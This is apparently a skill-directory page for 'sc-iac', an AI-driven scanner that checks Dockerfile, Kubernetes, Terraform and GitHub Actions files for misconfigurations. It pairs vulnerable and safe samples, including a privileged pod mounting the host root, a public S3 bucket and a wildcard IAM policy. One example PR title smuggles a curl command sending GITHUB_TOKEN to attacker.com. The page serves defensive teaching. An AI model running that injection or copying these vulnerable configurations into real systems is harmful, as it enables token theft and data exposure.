ワンクリックで
sc-iac
Infrastructure-as-Code security scanning — Dockerfile, Kubernetes, Terraform, and GitHub Actions misconfigurations
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Infrastructure-as-Code security scanning — Dockerfile, Kubernetes, Terraform, and GitHub Actions misconfigurations
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
Comprehensive AI-powered security scanning suite with 48 skills covering OWASP Top 10, 7 language-specific deep scanners (Go, TypeScript, Python, PHP, Rust, Java, C#), supply chain analysis, infrastructure-as-code scanning, and 3000+ checklist items. Use when you need to run a security audit, find vulnerabilities, scan a PR for security issues, or perform a penetration test on a codebase.
C#/.NET-specific security deep scan
Go-specific security deep scan
Java/Kotlin-specific security deep scan
PHP-specific security deep scan
Python-specific security deep scan
| name | sc-iac |
| description | Infrastructure-as-Code security scanning — Dockerfile, Kubernetes, Terraform, and GitHub Actions misconfigurations |
| license | MIT |
| metadata | {"author":"ersinkoc","category":"security","version":"1.0.0"} |
Scans Infrastructure-as-Code files for security misconfigurations including Dockerfile anti-patterns, Kubernetes privilege escalation, Terraform resource exposure, and GitHub Actions injection vulnerabilities. Covers the full deployment pipeline from build to runtime.
Called by sc-orchestrator during Phase 2 when IaC files are detected (Dockerfile, *.tf, k8s manifests, workflow files).
**/Dockerfile*, **/docker-compose*, **/*.tf, **/*.tfvars,
**/k8s/*, **/kubernetes/*, **/helm/*, **/*.yaml, **/*.yml,
**/.github/workflows/*, **/.gitlab-ci.yml, **/Jenkinsfile
# VULNERABLE: Running as root
FROM node:18
COPY . /app
CMD ["node", "app.js"] # Runs as root!
# SAFE: Non-root user
FROM node:18
RUN addgroup --system app && adduser --system --ingroup app app
COPY --chown=app:app . /app
USER app
CMD ["node", "app.js"]
ARG PASSWORD=secret)latest tag for base images# VULNERABLE: Privileged container
spec:
containers:
- name: app
securityContext:
privileged: true # Full host access!
runAsRoot: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: / # Mounting host filesystem!
# VULNERABLE: Public S3 bucket
resource "aws_s3_bucket" "data" {
bucket = "my-data-bucket"
acl = "public-read" # Publicly accessible!
}
# VULNERABLE: Overly permissive IAM
resource "aws_iam_policy" "admin" {
policy = jsonencode({
Statement = [{
Effect = "Allow"
Action = "*" # Full admin access!
Resource = "*"
}]
})
}
# VULNERABLE: Script injection via PR title
- run: echo "PR: ${{ github.event.pull_request.title }}"
# Attacker PR title: $(curl attacker.com/steal?token=$GITHUB_TOKEN)
# SAFE: Use environment variable
- run: echo "PR: $PR_TITLE"
env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: blockspull_request_target with checkout of PR code